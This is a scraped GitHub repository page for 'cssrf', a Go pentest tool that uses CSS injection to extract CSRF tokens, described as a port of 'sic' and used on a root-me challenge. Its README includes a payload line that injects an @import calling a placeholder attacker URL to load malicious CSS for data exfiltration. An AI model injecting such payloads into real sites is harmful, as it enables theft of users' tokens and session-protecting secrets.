Nothing Special   »   [go: up one dir, main page]
Skip to content

ariary/cssrf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
manual_script
manual_script
 
 
pkg/cssrf
pkg/cssrf
 
 
README.md
README.md
 
 
cssrf.gif
cssrf.gif
 
 
cssrf.go
cssrf.go
 
 
go.mod
go.mod
 
 

Repository files navigation

cssrf


Extract juicy information using CSS injection
especially csrf token 🥜


Basically the same thing as https://github.com/d0nutptr/sic but in Golang

I try my best to change the rust code but I lost so many time

Show me!

All you need is launch cssrf:

cssrf [flags] # nothing crazy => cssrf -h to get flags info

Inject the malicious css:

<!-- in <style> tag -->
@import url("https://[ATTACKER_URL]/malicious.css");

And wait:

demo

This help me solving a root-me challenge

Posting solution is forbidden, thus the csrf token is not integer

About

Ease CSS exfiltration

Topics

css csrf exfiltration websecurity pentest-tool

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases 2

v0.0.2 Latest
Feb 11, 2023
+ 1 release

Packages

No packages published

Languages